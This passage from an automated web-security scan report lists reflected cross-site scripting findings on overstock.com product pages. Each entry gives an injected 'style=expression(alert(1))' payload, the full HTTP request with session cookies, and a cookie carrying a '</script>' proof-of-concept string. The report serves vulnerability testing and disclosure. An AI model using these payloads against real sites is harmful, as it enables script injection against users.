GET /Worldstock/Agate-Inlaid-Handbag-India/544846/product.html?19e6c"style%3d"x%3aexpression(alert(1))"b3d4d740baf=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.518. http://www.overstock.com/Worldstock/Bamboo-Grove-Canvas-Wall-Art-China/5079546/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c71d"style%3d"x%3aexpression(alert(1))"69a7996b58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c71d"style="x:expression(alert(1))"69a7996b58 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Bamboo-Grove-Canvas-Wall-Art-China/5079546/product.html?4c71d"style%3d"x%3aexpression(alert(1))"69a7996b58=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.519. http://www.overstock.com/Worldstock/Brass-plated-Circle-of-Life-Cuff-Bracelet-India/4714454/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33536"style%3d"x%3aexpression(alert(1))"10f6a008da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33536"style="x:expression(alert(1))"10f6a008da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Brass-plated-Circle-of-Life-Cuff-Bracelet-India/4714454/product.html?33536"style%3d"x%3aexpression(alert(1))"10f6a008da=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9733"style%3d"x%3aexpression(alert(1))"6c530a5a65c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9733"style="x:expression(alert(1))"6c530a5a65c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Chinese-Bamboo-Rug-2x3/3943579/product.html?d9733"style%3d"x%3aexpression(alert(1))"6c530a5a65c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.521. http://www.overstock.com/Worldstock/Fused-Glass-Ocean-River-Meadow-Earrings-Chile/4655190/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8279b"style%3d"x%3aexpression(alert(1))"4167104671c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8279b"style="x:expression(alert(1))"4167104671c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Fused-Glass-Ocean-River-Meadow-Earrings-Chile/4655190/product.html?8279b"style%3d"x%3aexpression(alert(1))"4167104671c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.522. http://www.overstock.com/Worldstock/Garnet-and-Carnelian-Tropical-Orchard-Cluster-Earrings-Thailand/5074088/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1df2"style%3d"x%3aexpression(alert(1))"31fa5442435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1df2"style="x:expression(alert(1))"31fa5442435 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Garnet-and-Carnelian-Tropical-Orchard-Cluster-Earrings-Thailand/5074088/product.html?b1df2"style%3d"x%3aexpression(alert(1))"31fa5442435=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.523. http://www.overstock.com/Worldstock/Genuine-Leather-Brown-Riddles-Bracelet-Thailand/3291263/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423bc"style%3d"x%3aexpression(alert(1))"67743562be7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 423bc"style="x:expression(alert(1))"67743562be7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Genuine-Leather-Brown-Riddles-Bracelet-Thailand/3291263/product.html?423bc"style%3d"x%3aexpression(alert(1))"67743562be7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.524. http://www.overstock.com/Worldstock/Handcrafted-Recycled-Glass-Icicle-Ornaments-20-pack-India/550216/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2dde"style%3d"x%3aexpression(alert(1))"e953baa9425 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2dde"style="x:expression(alert(1))"e953baa9425 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Handcrafted-Recycled-Glass-Icicle-Ornaments-20-pack-India/550216/product.html?b2dde"style%3d"x%3aexpression(alert(1))"e953baa9425=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.525. http://www.overstock.com/Worldstock/Handcrafted-Turquoise-Attitude-Silver-Ring-Mexico/5191699/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cc1"style%3d"x%3aexpression(alert(1))"5c6bc0e580d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17cc1"style="x:expression(alert(1))"5c6bc0e580d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Handcrafted-Turquoise-Attitude-Silver-Ring-Mexico/5191699/product.html?17cc1"style%3d"x%3aexpression(alert(1))"5c6bc0e580d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.526. http://www.overstock.com/Worldstock/Handmade-Glass-and-Agate-Summer-Meadow-Necklace-India/3167006/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27dbf"style%3d"x%3aexpression(alert(1))"4799839a9c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27dbf"style="x:expression(alert(1))"4799839a9c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Handmade-Glass-and-Agate-Summer-Meadow-Necklace-India/3167006/product.html?27dbf"style%3d"x%3aexpression(alert(1))"4799839a9c3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.527. http://www.overstock.com/Worldstock/Iron-Dragon-Fly-Hanging-Bells-India/4042483/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca82a"style%3d"x%3aexpression(alert(1))"301e14ec6bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca82a"style="x:expression(alert(1))"301e14ec6bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Iron-Dragon-Fly-Hanging-Bells-India/4042483/product.html?ca82a"style%3d"x%3aexpression(alert(1))"301e14ec6bb=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.528. http://www.overstock.com/Worldstock/Oil-on-Canvas-Buddha-Profile-Painting-Indonesia/5036482/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d651"style%3d"x%3aexpression(alert(1))"2fe8065c1c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d651"style="x:expression(alert(1))"2fe8065c1c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Oil-on-Canvas-Buddha-Profile-Painting-Indonesia/5036482/product.html?4d651"style%3d"x%3aexpression(alert(1))"2fe8065c1c9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.529. http://www.overstock.com/Worldstock/Pearl-River-of-Snow-Strand-Necklace-3-8-mm-Thailand/4611190/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd313"style%3d"x%3aexpression(alert(1))"e4de43f82da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd313"style="x:expression(alert(1))"e4de43f82da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Pearl-River-of-Snow-Strand-Necklace-3-8-mm-Thailand/4611190/product.html?dd313"style%3d"x%3aexpression(alert(1))"e4de43f82da=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.530. http://www.overstock.com/Worldstock/Ribbon-Candy-Electroplated-Earrings-Kenya/4349561/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9f89"style%3d"x%3aexpression(alert(1))"05767e44fd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9f89"style="x:expression(alert(1))"05767e44fd5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Worldstock/Ribbon-Candy-Electroplated-Earrings-Kenya/4349561/product.html?d9f89"style%3d"x%3aexpression(alert(1))"05767e44fd5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.531. http://www.overstock.com/Worldstock/Set-of-2-Bold-Orange-Fortunes-Beaded-Wristband-Bracelets-Thailand/5086320/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f01"style%3d"x%3aexpression(alert(1))"7820c8b49a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94f01"style="x:expression(alert(1))"7820c8b49a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
